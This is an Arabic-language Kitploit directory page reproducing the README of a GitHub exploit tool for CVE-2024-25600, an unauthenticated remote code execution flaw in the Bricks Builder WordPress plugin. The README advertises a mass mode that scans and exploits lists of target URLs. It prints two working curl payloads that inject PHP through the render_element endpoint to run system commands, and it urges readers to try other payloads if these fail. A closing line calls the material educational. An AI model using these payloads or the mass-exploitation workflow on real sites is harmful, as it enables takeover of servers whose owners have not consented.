Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-25600-Bricks-Builder-plugin-for-WordPress — هذه الأداة مصممة لاستغلال ثغرة CVE-2024-25600 الموجودة في إضافة Bricks Builder لـ WordPress. تسمح الثغرة بتنفيذ أكواد برمجية عن بُعد دون مصادقة على المواقع المتأثرة. تعمل الأداة على أتمتة عملية الاستغلال عبر استرجاع الـ nonces وإرسال طلبات مصممة خصيصًا لتنفيذ أوامر عشوائية. | Kitploit
أدوات/GitHubGitHub/tornad0007/cve-2024-25600-bricks-builder-plugin-for-wordpress
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubtornad0007/cve-2024-25600-bricks-builder-plugin-for-wordpress

CVE-2024-25600-Bricks-Builder-plugin-for-WordPress

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

هذه الأداة مصممة لاستغلال ثغرة CVE-2024-25600 الموجودة في إضافة Bricks Builder لـ WordPress. تسمح الثغرة بتنفيذ أكواد برمجية عن بُعد دون مصادقة على المواقع المتأثرة. تعمل الأداة على أتمتة عملية الاستغلال عبر استرجاع الـ nonces وإرسال طلبات مصممة خصيصًا لتنفيذ أوامر عشوائية.

عرض المستودع
93منذ 2 سنواتلم تتم المراجعة بعد
مشاركة

أداة استغلال CVE-2024-25600 🚀

الوصف 📝

هذه الأداة 🛠️ مصممة لاستغلال ثغرة CVE-2024-25600 🕳️ الموجودة في إضافة Bricks Builder لـ WordPress. تسمح الثغرة بتنفيذ التعليمات البرمجية عن بُعد دون مصادقة على المواقع المتأثرة 💻. تعمل الأداة على أتمتة عملية الاستغلال عن طريق استرداد nonces وإرسال طلبات مصممة خصيصًا لتنفيذ أوامر تعسفية.

الميزات 🌟

  • الوضع التفاعلي: تفاعل مع الموقع المستهدف في الوقت الفعلي 🕹️.
  • الوضع الجماعي: فحص واستغلال مواقع متعددة من قائمة 📋.
  • تنفيذ الأوامر: تنفيذ أوامر تعسفية على الخادم المستهدف ⚙️.

التثبيت 🛠️

  1. استنسخ هذا المستودع إلى جهازك المحلي 🖥️ باستخدام git clone.
  2. انتقل إلى دليل المستودع المستنسخ.
  3. ثبّت مكتبات Python المطلوبة باستخدام pip install -r requirements.txt.

الاستخدام 📖

الوضع التفاعلي 🎮

  1. شغّل الأداة باستخدام python exploit.py -u <URL> لبدء الوضع التفاعلي.
  2. اتبع التعليمات التي تظهر على الشاشة لإرسال الأوامر إلى الخادم المستهدف.

الوضع الجماعي 📊

  1. جهّز ملفًا نصيًا يحتوي على قائمة بعناوين URL المستهدفة.
  2. شغّل الأداة باستخدام python exploit.py -l <file_path> لفحص واستغلال المواقع المدرجة.

إثبات المفهوم (PoC) 📝

إن إثبات المفهوم الأساسي المقدم من الكشف هو كما يلي:

curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

تحديث: إثبات مفهوم ثانٍ (أكثر موثوقية)

curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
  -H "Content-Type: application/json" \
  -d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "carousel",
    "settings": {
      "type": "posts",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

من الممكن أن تحقق حمولات إضافية نتائج أفضل. إذا لم يعمل استغلالي أو إثبات المفهوم معك، أشجعك على تجربة حمولات بديلة لإيجاد حل أكثر فعالية.

استبدل [HOST] بالموقع المستهدف و[NONCE] بقيمة nonce المسترجعة من الموقع.

المرجع 📖

لمزيد من المعلومات حول ثغرة CVE-2024-25600، يرجى الرجوع إلى الكشف المفصل على Snicco.io.

إخلاء المسؤولية ⚠️

المعلومات الواردة في هذا README هي لأغراض تعليمية فقط. القرصنة غير المصرح بها للمواقع أو الشبكات غير قانونية وغير أخلاقية. 🚫

الشكر والإقرارات 🙏

نشكر الباحثين في مجال الأمن الذين اكتشفوا وأبلغوا عن هذه الثغرة، مما وفر للمجتمع المعلومات والأدوات للمساعدة في تأمين تطبيقات الويب الخاصة بهم.

تنزيل الأداة